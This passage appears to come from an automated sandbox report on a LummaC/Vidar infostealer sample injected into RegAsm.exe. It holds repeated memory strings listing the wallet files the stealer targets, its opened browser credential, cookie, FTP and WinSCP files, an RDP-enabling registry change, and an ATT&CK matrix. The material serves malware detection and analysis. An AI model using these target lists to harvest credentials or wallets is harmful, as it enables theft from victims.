Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3 Wallet
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3040, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2052126229.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3af5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3af5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3040, type: MEMORYSTR

Allows multiple concurrent remote connection

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessions

Enables remote desktop connection

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnections

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 LSASS Driver	1 LSASS Driver	21 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	2 Remote Desktop Protocol	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	111 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 Create Account	2 Windows Service	41 Obfuscated Files or Information	Security Account Manager	5 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Windows Service	511 Process Injection	12 Software Packing	NTDS	56 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	23 Masquerading	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	511 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
